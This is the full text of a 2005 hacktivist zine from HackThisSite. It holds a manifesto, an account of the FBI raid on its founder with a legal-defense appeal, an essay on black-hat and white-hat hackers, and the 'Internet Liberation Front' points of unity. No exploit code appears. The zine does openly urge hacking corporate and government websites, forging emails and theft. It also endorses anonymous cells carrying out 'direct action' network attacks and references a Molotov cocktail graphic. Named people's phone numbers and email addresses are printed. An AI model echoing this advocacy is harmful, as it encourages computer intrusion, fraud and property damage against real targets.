Full text of "Hack This Zine - Issue 2"

Call in sick. Skip school. Go do something you always wanted to do. Take over an intersection with a bunch of people and music and start a dance party. Send fake emails posing as your [illegible] and announce raises for everybody. Get that [illegible] have otherwise been thrown away and give it to people who need it. Fuck with rich people. Say hi to everyone you pass on the street. Cross out words like oppression, exploitation and boredom in every dictionary. Write your own music and play it for free. Organize a local anti-capitalist collective [illegible] to strike terror in the hearts of the bosses and rulers. Call someone on their shit everytime when they say something racist, sexist or homophobic. [illegible] your own newsletter. Op everybody in an IRC channel. Do graffiti [illegible]. Help the elderly cross the street. [illegible] walk, or take public transportation instead of using a car. Refuse to always be a [illegible]. Call someone you haven't talked to in a while. [illegible] lists and donate money to charities. Heckle your boss and/or union bureaucrat whenever [illegible] free open source alternative to a [illegible] software application. Participate in a community garden in an abandoned lot. [illegible] others on historical revolutionary upheavals. [illegible] buckets and use them as drums [illegible] lively. Hack a corporate or government website and fill it with anti-capitalist messages. Start a radical cheerleaders squad. Write "This is your death" on every piece of money you can. Sneak your own art into museums. Steal books from big [illegible]
[illegible] a brick through a major corporation's [illegible] system. Steal someone's heart for a day. Falsify invitations to a yuppy art gallery and pass them out to the homeless. Celebrate every holiday of all countries and culture. [illegible]

IN THIS ISSUE...

FBI Raids Hack This Site Founder Jeremy Hammond
Project organizer Xec96 targeted by law enforcement: apartment raided, equipment seized.

Right Wing Hackers Target IndyMedia Network
HTS exposes fascist hackers and defends free speech on the net

Security Culture: Hackers in an Age of FBI Intimidation
How to protect ourselves: becoming anonymous, knowing our rights, and how to deal with the law.

Finding and Exploiting PHP Vulnerabilities
Remote intrusion techniques by exploring web script vulnerabilities

Hacking Local Mac OS X
Privilege escalation and other tricks and vulnerabilities in OS X.

Communication and Info Gathering during Protests
Police scanners, SMS messaging, black bloc tactics

Hacktivism with the Internet Liberation Front
Organizing politically motivated hackers against unjust corporations and governments.

anti-(c)opyright 2005 HackThisSite.org

NOTES FROM THE HACKER UNDERGROUND
a hacktivist manifesto
major hack this site milestones

TUNE IN: HAPPENINGS IN THE SCENE
hack this site founder raided by fbi
right wing hackers target indymedia network
directnic enforces icann whois contact info accuracy
phpbb 2.10 disclosure cause mischief and mayhem on the net
nmap developers intimidated by fbi... by wyrmkill

ARM YOURSELF: EXPLOITS AND TECHNIQUES
the art of the cipherer.. by psyche
finding and exploiting php script vulnerabilities
hacking local mac os x
c compilation on a low level... by forcemaster
security access, backdoors and gaining permissions

TAKE ACTION: HACKTIVISM IN PRACTICE
join revolution, live happier
security culture: hackers living in an age of fbi repression
police state usa and the politics of fear
bringing it to their door: civil disobedience @ inaugurations
paradise engineering, political change... by archaios
communication and info gathering at a protest ... alxciada
beyond physical borders: hacking and activism on the net. by fetus.
white and black. . .by shardz@dikline
autonomous hacktivism with the internet liberation front

NATIONAL SECURITY ALERT: SUBVERSIVE MATERIALS ENCLOSED

The government considers your very interest in this subject to be thought crime. Soon you will not even be able to create or distribute these text files without being made into a criminal by the corporate media and law enforcement policies.

The texts enclosed contain stories, projects, and ideas from people who have found ways to unplug themselves and hack the system. You can take these materials to use and distribute however you like. We can give you ammunition, but only you can set yourself free. Turn off your television and take to the streets. Get involved!
hacker conventions
DEFCON 13, July 29-31, Las Vegas - defcon.org
WHAT THE HACK, July 29-31, Netherlands - whatthehack.org
Hackers on Planet Earth 6, Summer 2006, New York City - 2600.com
2600 meetings - first friday of every month @ a city near you: 2600.com/meetings

free spirits

protests
Anti-G8 Actions, July 6-8, Scotland - dissent.co.uk
Biodemocracy 2005, June 18-21st, Philadelphia - ReclaimTheCommons.net

other events
Anarchist Bookfairs and Festivals - San Francisco, Madison, Montreal, and More
Burning Man, August 29 2006, Nevada - www.burningman.com
Rainbow Gatherings, June 1-7, Virginia - www.welcomehome.org

plug in at indymedia.org or infoshop.org for more actions

the usual suspects:

HTS STAFF: Xec96 ikari IceShaman buz archaios hairball whooka html OutThere brOkenkeychain Zortexia alxCIAda mcaster TheAnarchist weekend psyche \alive

ZINE TEAM: Xec96 alxCIAda Zortexia whooka Fetus Wyrmkill

OTHERS: smooth operator weiznit Morklitu forcemaster BIGC archangel_ dark-angel Truckle Phate Wells

THANKS TO hbx networks, Chicago 2600, dikline, those who refused to provide statements to the feds, IndyMedia, and the fine people at kinkos who helped us steal copies.

Zortexia thanks alxCIAda, JK-63 and archangel_ darkangel

Summer 2005

DISTRIBUTE ME WIDELY AND WILDLY!
This community publication is entirely free to own and free to share. We can only afford to publish a limited amount of copies, so we are counting on people to help pass it on to friends, local computer stores, hacker groups, 2600 meetings, libraries, bookstores, newsstands, etc.

ANTI-COPYRIGHT INFORMATION
Everything provided in this publication is anti-©opyright. Feel free to use and reuse any of the content provided here in your own projects. You're a part of this movement - spread the word!

CONTRIBUTE TO NEXT ISSUE!
We are always accepting additions. If you have anything to share about the latest exploits, hacktivist actions, or any other happening in the scene, send it in!
We accept a variety of different mediums: from writings, images, ascii art, links, technical documents, etc. There are a number of ways you can get involved, from submissions to grammar/editing or graphic design. Check out our zine forums or get in touch with the zine staff.

MAIL ORDER
Physical copies are available for mail order through Hack This Site's website. Single copies are $5, and 'anti-propaganda' packages which come with five magazines plus a flaming heap of underground newsletters, posters, leaflets, stickers, patches, etc. are available for $25.

ELECTRONIC COPIES
While we charge for physical copies of the zine to cover production costs, we believe that all information should be free to read and distribute. Electronic copies of the zine are available in a variety of formats on our website. Please distribute to various file sharing services, text file collections, etc.

Graphical PDF file: the complete magazine with complete graphical layout, ideal for printing additional copies of the zine. See the Do It Yourself Distro below for additional printing instructions.

Raw .TXT file: ideal for lynx users or quick and speedy distribution in file sharing services, BBSs, through email, etc.

Forums: Most of the articles in this zine are available at the zine forums on our website in TXT format, where people can add comments.

DO IT YOURSELF DISTRO!
We've received countless stories of HTS people reprinting copies of the zine on their own and giving it away to everyone they know - at school, work, 2600 meetings, etc. Now's your chance to do the same. All you need is access to some printer and PDF copies of the zine. There are two files for the zine: one is the color cover and the other is the black and white inside pages.
It is formatted double sided so that when printed it can simply be folded in half. If you are using a printer that can only print in single sides, print with one sheet of paper, turn it around and print the second page on the other side, repeating for the remaining pages. The cover PDF file is high resolution color and ideally would be best printed on glossy color paper. But if all you have is black and white, then go with it! Assemble the printed pages and use a long style stapler to bind them together. They have these available at universities, copy shops, art and craft stores, etc. If you are distributing copies (especially outside the U.S.) and want to make them available to others, let us know so we can announce your information to the Get Local section of the zine website.

Get Involved with Hack This Site
This movement is entirely what you make of it. We are structured in such a way that allows people to tune in, voice their opinions and make decisions about the direction of the site and community. Check us out on IRC, go to national actions and conventions (listed to the right) and get involved!

WWW: http://www.hackthissite.org
IRC: irc.hackthissite.org #hackthissite (SSL port 7000)
E-mail: htsdevs @ gmail.com

Notes from the Hacker Underground

As our hacking and activist communities grow, the ruling classes will try to react to stop us. We live in an age where our every thought and move is monitored, and to question the injustices of our society is demonized as unpatriotic. The corporate media scares the public with images of evil hackers and cyber-terrorists so congress can give more money to law enforcement and the ministry of peace. The Office of Homeland Security, the USA PATRIOT Act, Total Information Awareness. George W. Bush, Dick Cheney, John Ashcroft. The threat of fascism in America is not an impending threat: it's already here, and the lines are clearly drawn.
Inevitably those who question and confront the injustices of the political system will become targets for harassment by the rich and powerful. These words are coming to you from someone who is facing the full weight of these changes first hand. The success of Hack This Site as well as my participation in organizing a number of protest actions has made me a target of law enforcement. My apartment was raided by Chicago FBI who seized all of my equipment and is threatening me with felony charges citing millions of dollars in damage and up to thirty years in jail for a crime that hasn't even happened.

This is the reality of the political system we live in: the rich and powerful have no regard for human rights, and will do everything in their power to crush any sort of resistance against their empire. The feds are in the business of breaking lives and have had no reservations in making the most of these sweeping changes. IndyMedia servers are seized by international law enforcement. The FBI questions, raids, and arrests dozens of hackers a year, even from here at Hack This Site, HBX Networks, and various IndyMedia collectives. They grab server logs for servers that host hacker and anarchist websites like Infoshop.org, insecure.org, etc. Police arrested over 1800 people at the protests at the 2004 Republican National Convention while the FBI and the Secret Service investigate key organizers. When they had visited me, they had quoted several comments from Hack This Site's IRC server.

The reason why we are being monitored and intimidated is because they know what we are capable of doing if we realize our collective power and start doing something about it. The stakes are high, but they aren't unbeatable. The biggest weapon in their arsenal is how they can control people through fear. But every day, we hear stories about people who were smart and brave enough to outsmart them. If we let them walk all over us, then they win.
If we organize and put up a fight, then their grip is loosened and the truth may flow freely as the wind and trees. These are the opening shots in a war they say will not end in our lifetime.

The struggle to build a free internet and a free society has yielded some amazing results. We have developed open source software, peer to peer file sharing services, secure and anonymous open publishing systems, and much more than can be explained here. And every time we develop these exciting new technologies that let us pursue our creativity and innovation more freely, the establishment tries to keep up by inventing increasingly ridiculous legislation to stop us. But we will always be one step ahead of them: while they react, we create.

The balance of power between revolutionary hackers and the reactionary corporate government will exist in various degrees at all times. The problem isn't going away anytime soon. Instead of spending time fighting amongst ourselves, we need to work together to find solutions. Embrace a diversity of tactics and unite with our brothers and sisters to build a front to combat the right wing police state. Not only do we need to build defensive networks to circumvent their security and censorship, we need to take direct action and bring an end to the corporations and governments that stand in our way. While they are fighting for their paycheck, we are fighting for our lives.

Hacktivists of the world, unite!

If we can do it, anybody can!

That's right, we survived to produce our second issue! We put a lot of time and energy into putting this one together, and feel that it represents many of the actions, attitudes and lessons we've learned over the past year. You'll find that it has considerably better writings, more interesting tricks, and some amazing happenings. Check em out, drop by IRC some time, send us comments, and think about submitting something for the next issue.

We've grown quite a bit in the two years HTS has been around.
As talented contributors come and go, we've gotten to the point where the site and community is self-maintaining. As long as we continue to structure ourselves in an equal, open way that encourages users to participate, the project will become unstoppable and live longer than any of us. What happens now is up to you.

Major Hack This Site Milestones

• First challenges posted on Hulla-balloo.com in May 2002: 10 basic web challenges with a basic top scores section. Gets a surprising amount of usage and feedback with people volunteering to help with the site to make new challenges.
• Several unofficial IRC servers and channels are opened
• Launches HackThisSite.org in August 2003:
  • realistic missions with simulated targets and objectives
  • user contributed articles / external resources
  • user system that keeps track of missions completed
  • web based chat system
  • the 'hack this site' challenge and the hall of fame
• HTS staff organization is set up to maintain the various functions of the website (moderate articles, interact with users, post news, configure and develop new features, etc)
• HTS IRC server launched, online community explodes
• HTS public meetings are set up with set agendas and facilitated discussion for users to meet with staff about future projects of HTS, maintenance, and general hacker chat.
• HTS users and staff are inspired to produce several new challenges: in addition to new realistic missions, several new kinds of hacking challenges are introduced. Application Challenges lets you hack away at operating system level challenges. Encryption Challenges gives out a string encrypted with a custom algorithm and people compete against each other to crack it.
• Declares "Summer of Resistance" to have Hack This Site actions at several major hacker conventions and protests.
• Publishes first hacktivist zine, distributes hundreds through mail, and has them available at various infoshops and conventions for the following months.
24 half-page zine with hacktivist texts and technical articles.
• Organizes for the Fifth HOPE convention: 7/9/04: Chicago 2600 people drive up to NYC. Several people set up radical HTS table selling the zine and give radical propaganda away. Networks with other activists and hackers, especially gearing up for upcoming protests.
• Organizes for DEFCON convention 7/31/04: pick up several HTS people along the way to end up in Vegas. Meets with several local activists and hacking groups. Sells copies of 2600, distributes lots of propaganda, big hacktivism presence.
• Visited by Chicago FBI and is questioned regarding violence and disruption at the Republican National Convention protests, hacktivism and DEFCON
• Massive Republican National Convention protests, week full of marches and actions, various hacktivist actions, thousands arrested including 2600 and HTS people. About 80,000 registered HTS users
• HTS v3 released with complete recoding to accommodate for growth. New database, restructured staff, etc. More stable, interactive, and secure.
• HTS IRC merges with TopGamers IRC network. Technical lectures are organized by users to be held over IRC.
• HTS Radio set up with a live radio stream. Active IRC community built around sharing hacker tips and music. Eventually the server was shut down because of bandwidth and drama, but will return later.
• HTS developer Jessica discovers and releases the phpbb 2.0.10 highlight injection vulnerability, which spreads like wildfire across the net
• Root This Box released: new set of challenges where several users set up machines configured for free range hacking: complex team scoring mechanism, several boxes set up, many real-world hacking skills are shared and learned.
• Many HTS members start to interact with more radical and blackhat hacking teams as real world hacking skills increase
• Move to new dedicated server to accommodate for growth and bandwidth concerns
• HTS Radio relaunched with pre-recorded content.
Audio is separated into different 'play lists' which are streamed randomly as well as provided as downloads in radio archives. Collection of various hacker radio shows, convention presentations, indymedia content, timothy leary hippie shit, and unique HTS content.
• Major Counter-inaugural DC protest, anarchist actions all over the country, more hacktivist actions
• HBX Networks merges with HTS to provide free shell server and HAXOR Radio
• HTS breaks off with TopGamers network because of administrative differences: sets up IRC on our dedicated machine
• FBI raids Jeremy's house in massive investigation: accuses Jeremy of hacking into protestwarrior.com and threatens credit card fraud charges.
• HTS gears up for another summer full of actions: finishing up the next magazine and prepares for the DEFCON convention

the next level of hacking challenges
www.RootThisBox.org

Root This Box is a live hacking challenge where users can practice their attack and defense skills on machines set up for free range hacking. People form teams with other users and compete against other teams for control over these machines. When a machine is taken over, the team can put up a message and try to defend the machine against other attacking teams.

Tournament Play
Points are rewarded to teams based on the number of machines they have control of, what services they have running, and how long they can hold it. At the end of the month, the final scoreboard and team rankings are archived and reset as control over the servers is returned to their original owner to reconfigure and rerelease.

How do you play?
The object of the game is to hack and take over a system and gain enough access to modify the hack.html static page in the web root. You have to update this file with the name of your team and your message to the world. For a working hack.html page, check out our example. Our scripts parse these files on an hourly basis and update your team scores in our database.
From here, you have to defend the box against other teams who are also trying to take over. The longer you hold the most amount of boxes, the more points you get.

Box Submissions
The servers in this competition are submissions from users just like you. If you have an extra machine of any kind that you can throw on a network somewhere, consider setting it up for Root This Box! We like a diversity of configurations, hardware specs, and operating systems. Some box owners like to intentionally plant vulnerabilities, backdoors, or outdated software just to make the game more interesting. If you are interested in submitting a machine, please read the setup guide for specific details on how to configure your box for the competition.

How to Set up a machine for Root This Box
The game depends on having boxes set up and supplied from users just like you. If you have a spare machine lying around near a stable internet connection, consider submitting your box for the challenge. This guide will provide you with specific details and requirements for setting up a system to be entered in the Root This Box competition.

System Requirements
While you are encouraged to try a diversity of operating systems and configurations, there are some standards that need to be respected in order for it to work properly in our challenge.

You are required to have a static IP address or host or some sort of dyndns.org service. You are also required to run some sort of web service on port 80 that can deliver html files. If you are behind any sort of router or firewall, you need to make sure that it is configured to forward traffic (on at least the ports for the services you want to be running) to your box's local IP address so people can connect in. The machine should be hosted on a relatively speedy and stable internet connection and should be running as much as possible.
You also need to put a static html page in your web root called hack.html which our scripts will crawl and parse on an hourly basis for scoring purposes. This contains information like who is currently owning the box and what services are running.

Fun Options
Setting up a box and closing all services is no fun. Many people are putting together various configurations and even known vulnerabilities for users to play with. Of course, you are free to set up the box however you please, but we have a few recommendations.

Many people are creating low level accounts and allowing users to ssh or ftp into the box to have at least a low level of access to play around with and to launch further attacks which may elevate permissions. If you choose this route, make sure you set up a cron to reset the pass back to its default every five minutes or so, otherwise someone is going to set it to something else and no one else can connect.

If you need any help, you can get a hold of the RTB staff @ the IRC server irc.hackthissite.org (ssl 7000) in #rootthisbox

HTS GRAFFITI CONTEST

Reclaiming public space has been a pastime of hackers and revolutionaries alike. This issue, we're starting a hacktivist graffiti contest. We want to see pictures of your best hacker or activist related tags.

In a world where public space is sold to the highest bidder, graffiti is a medium of expression not controlled by corporations or government. So grab a can of spraypaint and hit the town! It's amazingly easy, from making stencils to wheatpasting posters to just carrying a sharpie around with you. A blank wall is a blank mind!

Send all contributions to xec96 at hackthissite.org.
Include an image, your city, and your name.

billboardliberation.com, subvertise.org, radicalgraphics.org, sniggle.net

Hacker Activist Jeremy Hammond Raided by FBI and Threatened with False Felony Charges

On March 17 2005, nine Chicago FBI agents raided and seized all electronic equipment in Jeremy Hammond's apartment. Facing intimidation from both the FBI and the Secret Service, he is being accused of hacking into right-wing website ProtestWarrior.com and stealing credit card numbers. While the website had not been damaged and no credit cards were billed, the FBI is threatening to charge him with fraud and unauthorized access totalling to millions of dollars in damages and up to thirty years in federal prison for a crime that hasn't even happened.

Jeremy Hammond (xec96) was the founder of online hacking community HackThisSite.org which taught network security skills through a series of online hacking challenges. With his coordination the website was able to publish a series of magazines, launch an online hacktivist radio station, and start several hacking competitions. Because it has grown to be increasingly controversial, it is facing overblown intimidation from unjust law enforcement policies despite being legal and non-destructive in nature.

Jeremy also worked with several local and national anti-war groups to organize for a variety of marches, rallies, and national demonstrations including the Republican National Convention in NYC, the counter-inauguration protests in Washington DC, and dozens of other local Chicago actions.

Jeremy Hammond is an innocent man who is being targeted for his participation in the struggle for social justice and the success of the Hack This Site community. His passion and determination to challenge the injustices of the rich and powerful has made him a target of harassment by law enforcement. Please ask the US District Attorney's Office to drop the charges!
updates@FreeJeremy.com
FreeJeremy.com Legal Defense
FreeJeremyNow@gmail.com
Contact: Loren Blumenfeld, attorney - 312-939-0140
Contact: Wyatt Anderson, administrator of HTS: wanderson@gmail.com

Hack This Site founder Jeremy Hammond

Who is Jeremy Hammond?

Jeremy was a political hacker who used his abilities to defend a free internet and a free society. He has founded a number of projects including several progressive newspapers, educational websites, and helped organize a series of political protests. He has worked to defend the IndyMedia project from right-wing hackers by finding and fixing several vulnerabilities. While his activities have been ethical and non-destructive, he has found himself a target of law enforcement because he has been brave enough to stand up to the injustices of the political system.

Jeremy Hammond was the founder of online hacking community HackThisSite.org which taught network security skills through a series of online hacking challenges. With his coordination the website was able to publish a series of magazines, launch an online hacktivist radio station, and start several hacking competitions. While the site has grown it has become increasingly controversial. The site and community is facing overblown intimidation from law enforcement policies, despite being legal and non-destructive in nature.

Jeremy also worked with several local and national anti-war groups to organize for a variety of marches, rallies, and national demonstrations including the Republican National Convention in NYC, the counter-inauguration protests in Washington DC, and dozens of other local Chicago actions.

How and why is Jeremy being threatened by the FBI?

On March 17, 2005, Jeremy's apartment was raided by nine FBI agents who ransacked the place, seizing all electronic equipment as well as the house phone/address book, the lease, important notebooks, and even an x-box. Since then, Jeremy and his lawyer have been meeting with the US attorney and the FBI.
The US government says that they will be indicting him with several felony charges related to computer hacking and credit card fraud.

Jeremy was also visited by the United States Secret Service on April 13 who checked out his apartment and asked Jeremy a few questions related to his political activities. They were asked by the FBI who tipped them off about Jeremy's protest activities and anarchist tendencies. The SS asked about what political groups he has worked with, what protests he has been to, whether he was going to assassinate the president, etc.

The FBI has stated that they have been monitoring Jeremy's actions for at least six months (since Summer 2004) when the FBI first visited Jeremy questioning him about possible disruption and violence at the Republican National Convention protests in NYC late August. The FBI has gone as far as quoting several private conversations from the Hack This Site IRC server, talked about places Jeremy has been, etc. They also say that they have stopped by his apartment on several occasions to check up and take pictures. His phone and internet connection is almost certainly tapped as the FBI has stated that they will be watching his every action and statement.

What is Jeremy being accused of doing?

The FBI alleges that he is involved with an underground hacking group that has hacked and gained access to the right-wing website ProtestWarrior and took credit card numbers belonging to people who ordered products off of their online store. The FBI says that he was involved in a plot to make donations from these credit card numbers to various humanitarian charities, civil rights activists, and leftist protest groups.

Autonomous Hacktivism with the Internet Liberation Front

In the online struggle for social justice, many of our comrades have fallen victim to law enforcement. In order for us to remain effective, we need to find ways of clearing ourselves of becoming targets of harassment from the rich and powerful.
To continue to question and confront the established order, we need to explore more secure models of radical organizing. As part of adopting security culture and becoming anonymous, we need to organize ourselves in a decentralized way so that a single person being busted does not take down the entire group.

The Internet Liberation Front (ILF), like the Animal and Earth Liberation Front before it, is a tactic to take action anonymously yet still connect with larger and broader social movements. Several ILF cells operating independent of each other with different goals but under the same points of unity allows a diversity of tactics as well as giving others a way of tuning in and joining the struggle.

While the proposed points of unity can serve as a useful guideline for people who are organizing their own hacktivist cells, it is by no means a strict code which demands obedience. People are free to use and reuse this code as they see fit, and are free to make modifications and reuse the name if it suits their purposes.

Hacktivists of the world, unite!

ILF POINTS OF UNITY

1. We recognize that the established order of corporations and governments stands in the way of achieving an open internet and a free society.

2. We utilize a diversity of tactics in achieving our goals, ranging from digital rights hacktivism like building and protecting alternative channels of free secure communication to direct action hacktivism against those who are actively working against a free internet.

3. We need to break out of the digital realm and coordinate with and participate in political protests around the world. Our resistance must be global: on the streets and on the net!

4. The very interest in the subject will label yourself as a criminal in the eyes of the state. To protect yourself and others in the movement, we need to facilitate and build a culture of security.
Organize in a decentralized anonymous way, communicate securely, don't rat on others, and become a ghost.

5. The Internet Liberation Front belongs to nobody and everybody. Anyone who is acting under these points of unity is considered an operative of the ILF, and is free to utilize and build upon the name and ideals.

A scenario: Microsoft is hired by the Chinese government to develop systems that block political websites. First, digital rights hacktivists circumvent their censorship by developing open publishing software (like Freenet, IndyMedia, and file sharing services) so we can communicate securely and anonymously. Then direct action hacktivists orchestrate attacks on both Microsoft and Chinese computer networks while publicly releasing the source code to the Windows operating system. Press releases are sent out to the media. The birds chirp. The sun rises.

[Graphic from the "Freedom Fighter" manual: "Incendiary Bomb ("Molotov Cocktail")", text in English and Spanish]

right wing subversion

Scattered throughout this issue is a series of graphics advocating random acts of destruction and violence. These were made and distributed by the CIA to create instability and unrest in democratic countries.
The US government replaced several governments with right-wing puppet dictators friendly to the interests of the US economic and political system. This pamphlet was called the "Freedom Fighter" manual.

Every day we are bombarded with media that tries to control not only what we think, but what we think about. We care more about Janet Jackson's nipple on television than we do about economic inequalities, international instability, or the impending energy crisis. The televisions tell us to purchase the latest cleaning products while billions around the world do not have healthy drinking water. Reality TV? Fox News? Fair and balanced?

If you want to change society, change yourself. Change the words you use, change the media. Use their propaganda against them. Subvert their images.

adbusters.org / subvertise.org / radicalgraphics.org
abc.net.au/arts/headspace/rn/bbing/trouble/

This paper is designed to explain to people how the security industry works and why black and white hats both need each other. First off, for those of you that say you are grey hats, there is no gray hat. Gray hat is white hat; the issue is quite literally black and (or in this case) white. I'm not going to claim either to work for "the industry" as a white hat. Nor will I claim to be part of the black hat scene, but anywayz let's get started.

White hats certainly need black hats because without them there would not be a security industry. Also, when I say 'white hat' I don't mean sys-admins, because sys-admins are just doing their job. I'm talking about people like Lance Spitzner (Project Honeynet), or David Litchfield, some of whose papers I like; I just don't think that when he talks about SQL passwords and how to crack them, he should write an accompanying tool that will more likely be used by script kids than sys-admins. Lists like BugTraq and other full disclosure lists have to be the most counterproductive things ever created, but they also prove the point that white hats need black hats.
Lists like the aforementioned do more harm than good; the number of script kiddies that are nurtured and encouraged by these lists far outweighs the number of patches written and holes closed. However, without such support such lists would quickly become irrelevant: since no one would be hacking boxes, security would no longer be an issue. If people simply stopped posting to such lists and followed a path of non-disclosure and reported bugs directly to the vendors (or kept them private =)), security would improve drastically since kiddies would have nothing to feed off of, thus reducing the attacks. Personally I think projects like pr0j3kt m4yh3m are a rude alert to the white hats that something is terribly awry. It's sad to think that they, in their self-righteous journey to "secure" the internet, are the ones helping to make it less secure. Either that or they're in it for the money and know exactly what they're doing; I believe it's a combination of both, more so the latter than the former.

Black hats, at least true black hats, don't need white hats in any sense. However, if you use a loose interpretation of the term they do, and for this paper black hat will encompass script kiddies as well as the people at the darkest ends of the spectrum. By ignoring the truly talented black hats and focusing more on the kiddies, the bond between black and white will become clear. Script kiddies, in their early stages of messing with computers, thrive on white hat mailing lists like BugTraq for their infoz. These lists dumb down every topic and make tools simple enough for them to use on a mass scale. They then go and use these tools to hack computers and leave defacements, or install psybnc, or whatever. Then all of the sysadmins that get owned for not patching their systems within 37 seconds of the BugTraq post complain that the security industry sucks and is insecure. Then a huge amount of money is spent to research and discover security bugs.
These bugs are then posted to a security mailing list where script kiddies gather tools and infoz and hack more computers. It's a vicious circle that has snowballed out of control.

I don't think anyone really learns from these lists: in theory these lists are meant to benefit security by applying pressure to the vendors to patch their systems. Which they do; however, the sysadmins that avidly read this list are so few that the list is fairly inefficient. Therefore many systems are left unpatched and now many kiddies have a tool they can use to exploit them. The true blackhat hackers that code their own exploits paradoxically enough help the security industry more than the full disclosure white hats. This is because a single blackhat, or even a group, with an unreleased exploit will often do far less damage than the numerous script kiddies with a publicly disclosed exploit. The blackhats that don't disclose their exploits may not be helping security 100% but they are doing more good by keeping their exploits private. The chances of sysadmins getting hacked by a handful of black hat hackers with an exploit are far less than those of these sysadmins getting owned by a script kiddie with a tool they ripped off some list.

The real threat: when the media, the anti-virus companies, or whoever mention "hackers", who they really mean are kids with tools they discovered off of full disclosure lists. The Anti-Virus/Security industry is a multi-million dollar industry that thrives on its colleagues doing security "research", and releasing bugs that kiddies of the virus world can turn into a devastating worm so that the public will buy their product. But you might ask, if the vulnerabilities were known about, how come the worm or whatever was so devastating? Because people don't patch their systems. Almost any security breach can be boiled down to an error between the keyboard and the chair.
Theoretically, if Joe Blow subscribed to BugTraq and patched his systems as the bugs came out, full disclosure would be a wonderful system. However, the public does not subscribe to BugTraq; even most sysadmins don't carefully monitor the integrity of their systems, as that would be a 24 hour a day job.

Black hat hackers are not the problem; it's the industry itself and the white hat full disclosure mentality. And since the industry is spawning legions of "hackers" a day, they will never go away. Thus the industry is the only problem in this equation that can be solved. The kiddies aren't going away. The blackhats aren't disclosing. But the white hats seem to be the root of all the problems.

After reading this paper you may be wondering where my stance is, what "hat" I wear, since before I said I was neither a white hat nor a black hat. And the answer is, rogue hat. A rogue is simply a hacker that looks out for himself and their group. We don't have stereotypical agendas. We are not in it just to learn, or to help improve security. We are not in it to cause mayhem or make money. We are simply in it.

Finally I will leave you all with a question. Since when did we start calling the security "scene" an industry?

shardz@dikline

These charges are outrageous and reactionary because none of this has actually happened. The website has not been defaced and no credit card numbers have been billed. The FBI and the US Attorney have quoted several million dollars of damages (~$500 per credit card) and are threatening up to thirty years in federal prison for a crime that has not been committed.

Who is ProtestWarrior?

ProtestWarrior.com is a right-wing group that tries to provoke and disrupt constitutionally protected protests and actions of progressive organizations. They foster conservative and intolerant dogma which borders on abusive hate speech.
Their most recent national action was their attempt to cause trouble at the counter-inauguration protests in Washington DC, where they failed miserably in being effective or generating any decent numbers of supporters.

Although no damage had been done to their system, the Protest Warriors have been known to falsely report information to the police in an attempt to incriminate and demonize leftists. This particular case is similar: while no damage has been done to the website or credit cards, ProtestWarrior is trying to demonize and incriminate hackers and activists. What is ironic is that ProtestWarrior has worked with groups like RightWingExtremist.net and the g00ns to hack IndyMedia and other leftist sites in the past.

Read an in-depth discussion of ProtestWarrior, what they stand for, and how to expose them: http://indymedia.us/en/2005/03/5268.shtml

References

This is a short list of documents and reading materials related to federal law and cybercrime.

"Everything a Hacker Needs to Know about Getting Busted by the Feds" - http://www.grayarea.com/agsteal.html
A general introduction to federal law as related to hacking and cybercrime from Agent Steal, who served 36 months for similar charges.

1030: Computer Fraud and Abuse Act - http://caselaw.lp.findlaw.com/casecode/uscodes/18/parts/i/chapters/47/sections/section_1030.html
Title 18 Part I Chapter 47 Section 1030 - Fraud and related activity in connection with computers. Criminal charges for unauthorized access.
Cyber Security Enhancement Act of 2002 - http://www.cybercrime.gov/homeland_CSEA.htm
Additions from the Homeland Security Act which make changes to the Computer Fraud and Abuse Act and strengthen the penalties and surveillance capabilities of law enforcement.

Searching and Seizing Computers and Obtaining Electronic Evidence in Criminal Investigations - http://www.usdoj.gov/criminal/cybercrime/searching.html

Contacts

If you would like to know how you can support Jeremy or if you have any information that can be helpful to his case, please get a hold of someone on the legal support team. The email address FreeJeremyNow@gmail.com is shared with several friends and family members. This is the best bet in seeing that your information is made available to everyone on the team. For quicker results, you may need to get a hold of someone directly using the information below:

Loren Blumenfeld, Jeremy's lawyer, is available at his office phone at 312-939-0140.

Wyatt Anderson, admin of HackThisSite.org who works with Jeremy on the site, can be reached at wanderson@gmail.com.

What property has the FBI seized?

Nearly everything electronic has been seized from their house, in addition to a number of private notes and documents including notebooks as well as a copy of their lease. In addition to taking Jeremy's property, they have also seized his roommate's computers and other equipment which were unrelated to the incident. Details of all property seized are included in the search warrant receipt.

While it has been more than two months since the original incident, the FBI has not filed charges nor returned any property. We are sending out an official Motion for Return of Property, which the FBI is required to do under Rule 41(e) of the Federal Rules of Criminal Procedure.

How could I support the case against these ridiculous charges?
Support can range from signing the online petition, making a donation, or contacting the US Attorney, to just spreading the word about Jeremy's situation. Please see the support page for more details.

Are copies of the search warrant available?

Electronic copies of the search warrant can be downloaded at the website FreeJeremy.com. The affidavit which established probable cause has not been shown to us yet.

Complete manual made by and for federal law enforcement regarding how to obtain a warrant for a search and the procedure for gathering evidence on seized equipment for criminal investigations.

Field Guidance on New Authorities That Relate to Computer Crime and Electronic Evidence Enacted in the USA Patriot Act of 2001 - http://www.usdoj.gov/criminal/cybercrime/PatriotAct.htm
Document for law enforcement that details new surveillance capabilities and evidence collection as a result of changes with the USA Patriot Act. Scary read!

Federal White Collar Crime - http://profs.lp.findlaw.com/collar/
A broad, non-computer-specific introduction to federal criminal law.

Homeland Insecurity: The end of Civil Liberties - http://www.oilempire.us/homeland.html
An analysis of recent anti-'terrorism' legislation which removes many of our constitutionally protected freedoms and sets the stage for a new age of fascism.

Pong Khumdee, partner and roommate, can be reached at pongtakespictures@gmail.com.

Chris Montgomery, roommate and co-worker, can be reached at chris@macspecialist.com.

Jason Hammond, Jeremy's twin brother, can be reached at icetitan@graffiti.net.

Please take into consideration that this is an ongoing criminal investigation, and all of the above information is likely tapped and monitored. Please do not send anything incriminating or detrimental to Jeremy's case.
Right Wing Hackers Attack Independent Media Network

A number of people have started to organize and attack various Independent Media Centers as well as a number of other progressive and leftist websites. In the past, these attacks have ranged from simple xss attacks which redirect visitors to trashing the filesystem / databases. The people responsible show no understanding of the ideas behind the open publishing system IndyMedia, which is free for all users to participate in the discussion. These actions are not hacking nor hacktivism: they utilize public pre-written exploits to simply 'shout the other side down'. An attack on IndyMedia is an attack on free speech itself. These right-wing extremists need to be confronted and exposed as the online fascists they really are.

